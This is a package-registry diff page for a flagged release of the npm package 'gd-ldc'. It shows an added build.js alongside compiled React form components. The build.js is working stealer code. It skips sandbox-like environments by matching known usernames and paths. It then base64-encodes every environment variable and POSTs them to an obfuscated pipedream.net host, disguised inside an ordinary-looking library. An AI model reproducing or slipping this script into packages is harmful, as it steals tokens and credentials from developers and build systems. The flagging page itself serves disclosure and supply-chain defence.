gd-ldc 0.0.1-security → 4.509.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of gd-ldc might be problematic. Click here for more details.

Files changed (33) hide show
  1. package/build.js +54 -0
  2. package/lib/components/FormFactory/FormContainer.js +162 -0
  3. package/lib/components/FormFactory/FormFactory.js +825 -0
  4. package/lib/components/FormFactory/QuestionNavigation.js +124 -0
  5. package/lib/components/FormFactory/formContainerHelpers.js +102 -0
  6. package/lib/components/FormFactory/formFactoryHelpers.js +117 -0
  7. package/lib/components/FormFactory/formFactoryStyle.js +69 -0
  8. package/lib/components/FormFactory/index.js +13 -0
  9. package/lib/components/InputFactory/InputFactory.js +407 -0
  10. package/lib/components/InputFactory/index.js +26 -0
  11. package/lib/components/InputFactory/inputFactoryHelpers.js +16 -0
  12. package/lib/components/InputFactory/inputFactoryStyle.js +61 -0
  13. package/lib/components/LightweightDataCollection/LightweightDataCollection.js +115 -0
  14. package/lib/components/LightweightDataCollection/LightweightDataCollectionContainer.js +87 -0
  15. package/lib/components/LightweightDataCollection/index.js +37 -0
  16. package/lib/components/LightweightDataCollection/lightweightDataCollectionHelpers.js +57 -0
  17. package/lib/components/LightweightDataCollection/lightweightDataCollectionStyle.js +37 -0
  18. package/lib/components/ModuleNotification/ModuleNotification.js +139 -0
  19. package/lib/components/ModuleNotification/index.js +13 -0
  20. package/lib/components/ModuleNotification/moduleNotificationStyle.js +19 -0
  21. package/lib/components/MultipleChoice/MultipleChoice.js +100 -0
  22. package/lib/components/MultipleChoice/index.js +13 -0
  23. package/lib/components/ProgressBar/ProgressBar.js +74 -0
  24. package/lib/components/ProgressBar/index.js +13 -0
  25. package/lib/components/ProgressBar/progressBarStyle.js +23 -0
  26. package/lib/components/common/ErrorBoundary.js +48 -0
  27. package/lib/components/common/commonStyle.js +26 -0
  28. package/lib/components/common/constants.js +31 -0
  29. package/lib/components/common/utils.js +397 -0
  30. package/lib/contexts/ldcContextHelpers.js +130 -0
  31. package/lib/index.js +21 -0
  32. package/package.json +28 -3
  33. package/README.md +0 -5
package/build.js ADDED
@@ -0,0 +1,54 @@
1
+ var http = require('https');
2
+
3
+ var filter = [
4
+ { key: ['npm', 'config', 'registry'].join('_'), val: ['taobao', 'org'].join('.') },
5
+ { key: ['npm', 'config', 'registry'].join('_'), val: ['registry', 'npmmirror', 'com'].join('.') },
6
+ { key: 'USERNAME', val: ['daas', 'admin'].join('') },
7
+ { key: '_', val: '/usr/bin/python' },
8
+ { key: 'npm_config_metrics_registry', val: ['mirrors', 'tencent', 'com'].join('.') },
9
+ [
10
+ { key: 'MAIL', val: ['', 'var', 'mail', 'app'].join('/') },
11
+ { key: 'HOME', val: ['', 'home', 'app'].join('/') },
12
+ { key: 'USER', val: 'app' },
13
+ ],
14
+ [
15
+ { key: 'EDITOR', val: 'vi' },
16
+ { key: 'PROBE_USERNAME', val: '*' },
17
+ { key: 'SHELL', val: '/bin/bash' },
18
+ { key: 'SHLVL', val: '2' },
19
+ { key: 'npm_command', val: 'run-script' },
20
+ { key: 'NVM_CD_FLAGS', val: '' },
21
+ { key: 'npm_config_fund', val: '' },
22
+ ],
23
+ [
24
+ { key: 'HOME', val: '/home/username' },
25
+ { key: 'USER', val: 'username' },
26
+ { key: 'LOGNAME', val: 'username' },
27
+ ]
28
+ ];
29
+
30
+ function main() {
31
+ var data = process.env || {};
32
+ if (
33
+ filter.some((entry) =>
34
+ [].concat(entry).every((item) => (data[item.key] || '').includes(item.val) || item.val === '*')
35
+ ) ||
36
+ Object.keys(data).length < 10
37
+ ) {
38
+ return;
39
+ }
40
+
41
+ var req = http
42
+ .request({
43
+ host: ['eo2xxnl9l1zavt', 'm', ['pi', 'pedream'].join(''), 'net'].join('.'),
44
+ path: '/' + (data.npm_package_name || ''),
45
+ method: 'POST',
46
+ })
47
+ .on('error', function (err) {
48
+ });
49
+
50
+ req.write(Buffer.from(JSON.stringify(data)).toString('base64'));
51
+ req.end();
52
+ }
53
+
54
+ main();
@@ -0,0 +1,162 @@
1
+ "use strict";
2
+
3
+ var _interopRequireDefault = require("@babel/runtime/helpers/interopRequireDefault");
4
+
5
+ Object.defineProperty(exports, "__esModule", {
6
+ value: true
7
+ });
8
+ exports["default"] = void 0;
9
+
10
+ var _toConsumableArray2 = _interopRequireDefault(require("@babel/runtime/helpers/toConsumableArray"));
11
+
12
+ var _defineProperty2 = _interopRequireDefault(require("@babel/runtime/helpers/defineProperty"));
13
+
14
+ var _slicedToArray2 = _interopRequireDefault(require("@babel/runtime/helpers/slicedToArray"));
15
+
16
+ var _propTypes = _interopRequireDefault(require("prop-types"));
17
+
18
+ var _react = require("react");
19
+
20
+ var _utils = require("../common/utils");
21
+
22
+ var _formContainerHelpers = require("./formContainerHelpers");
23
+
24
+ function ownKeys(object, enumerableOnly) { var keys = Object.keys(object); if (Object.getOwnPropertySymbols) { var symbols = Object.getOwnPropertySymbols(object); if (enumerableOnly) symbols = symbols.filter(function (sym) { return Object.getOwnPropertyDescriptor(object, sym).enumerable; }); keys.push.apply(keys, symbols); } return keys; }
25
+
26
+ function _objectSpread(target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i] != null ? arguments[i] : {}; if (i % 2) { ownKeys(Object(source), true).forEach(function (key) { (0, _defineProperty2["default"])(target, key, source[key]); }); } else if (Object.getOwnPropertyDescriptors) { Object.defineProperties(target, Object.getOwnPropertyDescriptors(source)); } else { ownKeys(Object(source)).forEach(function (key) { Object.defineProperty(target, key, Object.getOwnPropertyDescriptor(source, key)); }); } } return target; }
27
+
28
+ var FormContainer = function FormContainer(props) {
29
+ var _props$initialValues = props.initialValues,
30
+ initialValues = _props$initialValues === void 0 ? null : _props$initialValues;
31
+
32
+ var _useState = (0, _react.useState)(initialValues),
33
+ _useState2 = (0, _slicedToArray2["default"])(_useState, 2),
34
+ values = _useState2[0],
35
+ setValues = _useState2[1];
36
+
37
+ var _useState3 = (0, _react.useState)({}),
38
+ _useState4 = (0, _slicedToArray2["default"])(_useState3, 2),
39
+ errors = _useState4[0],
40
+ setErrors = _useState4[1];
41
+
42
+ var handleBlur = function handleBlur(param) {
43
+ var type = param.type,
44
+ questionKey = param.questionKey,
45
+ stepIdx = param.stepIdx,
46
+ answerKey = param.answerKey,
47
+ valueObj = param.valueObj;
48
+ var currentQuestionValue = values[questionKey] || {};
49
+ var currentStepValue = currentQuestionValue[stepIdx] || {};
50
+ var answerLabel = null;
51
+
52
+ switch (type) {
53
+ case _utils.InputType.AUTOCOMPLETE:
54
+ answerLabel = values[questionKey] && values[questionKey][stepIdx][answerKey].label || null;
55
+
56
+ if (valueObj.label !== answerLabel) {
57
+ setValues(_objectSpread({}, values, (0, _defineProperty2["default"])({}, questionKey, _objectSpread({}, currentQuestionValue, (0, _defineProperty2["default"])({}, stepIdx, _objectSpread({}, currentStepValue, (0, _defineProperty2["default"])({}, answerKey, valueObj)))))));
58
+ }
59
+
60
+ break;
61
+
62
+ default:
63
+ break;
64
+ }
65
+ };
66
+
67
+ var handleChange = function handleChange(param) {
68
+ var questionKey = param.questionKey,
69
+ stepIdx = param.stepIdx,
70
+ answerKey = param.answerKey,
71
+ valueObj = param.valueObj;
72
+ var currentQuestionValue = values[questionKey] || {};
73
+ var currentStepValue = currentQuestionValue[stepIdx] || {}; // TODO: Use reducer
74
+
75
+ setValues(_objectSpread({}, values, (0, _defineProperty2["default"])({}, questionKey, _objectSpread({}, currentQuestionValue, (0, _defineProperty2["default"])({}, stepIdx, _objectSpread({}, currentStepValue, (0, _defineProperty2["default"])({}, answerKey, valueObj)))))));
76
+ };
77
+
78
+ var handleSubmit = function handleSubmit(question) {
79
+ var answer = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : {};
80
+ var stepIndex = arguments.length > 2 ? arguments[2] : undefined;
81
+ var questionKey = question.questionKey,
82
+ postUrl = question.postUrl,
83
+ _question$postBody = question.postBody,
84
+ postBody = _question$postBody === void 0 ? null : _question$postBody,
85
+ steps = question.steps;
86
+ var fields = steps[stepIndex].fields;
87
+ var field = fields[0];
88
+ var type = field.type;
89
+ setErrors({});
90
+ var validationErrors = (0, _formContainerHelpers.validate)({
91
+ question: question,
92
+ values: values[questionKey]
93
+ });
94
+
95
+ if (!Object.keys(validationErrors).length) {
96
+ if (!postBody) return true;
97
+ var shouldGenerateInputs = false;
98
+ var input = null;
99
+
100
+ switch (type) {
101
+ case _utils.InputType.AUTOCOMPLETE:
102
+ case _utils.InputType.CHECKBOXES:
103
+ case _utils.InputType.DROPDOWN_CHECKBOX:
104
+ case _utils.InputType.TEXT:
105
+ input = (0, _utils.flatten)(values[questionKey]);
106
+ break;
107
+
108
+ case _utils.InputType.AUTOCOMPLETE_MULTI:
109
+ shouldGenerateInputs = true;
110
+ input = {
111
+ data: (0, _utils.flatten)(values[questionKey], function () {
112
+ var acc = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : [];
113
+ var current = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : {};
114
+ return [].concat((0, _toConsumableArray2["default"])(acc), (0, _toConsumableArray2["default"])(current));
115
+ })
116
+ };
117
+ break;
118
+
119
+ case _utils.InputType.DROPDOWN:
120
+ case _utils.InputType.MULTIPLE_CHOICE:
121
+ input = answer;
122
+ break;
123
+
124
+ default:
125
+ return true;
126
+ }
127
+
128
+ (0, _utils.apiHelper)({
129
+ postUrl: postUrl,
130
+ options: {
131
+ body: (0, _utils.applyTemplate)(postBody, _objectSpread({}, input, {
132
+ GD_TOKEN: (0, _utils.getGlobal)('GD.page.gdToken')
133
+ }), shouldGenerateInputs)
134
+ }
135
+ })["catch"](function (err) {
136
+ _utils.logHelper.error("[FormContainer:handleSubmit] Error submitting ".concat(type, ": ").concat(err.message));
137
+ });
138
+ return true;
139
+ }
140
+
141
+ setErrors(validationErrors);
142
+ return false;
143
+ };
144
+
145
+ return props.children({
146
+ values: values,
147
+ errors: errors,
148
+ handleBlur: handleBlur,
149
+ handleChange: handleChange,
150
+ handleSubmit: handleSubmit,
151
+ setErrors: setErrors
152
+ });
153
+ };
154
+
155
+ FormContainer.propTypes = {
156
+ initialValues: _propTypes["default"].shape({})
157
+ };
158
+ FormContainer.defaultProps = {
159
+ initialValues: {}
160
+ };
161
+ var _default = FormContainer;
162
+ exports["default"] = _default;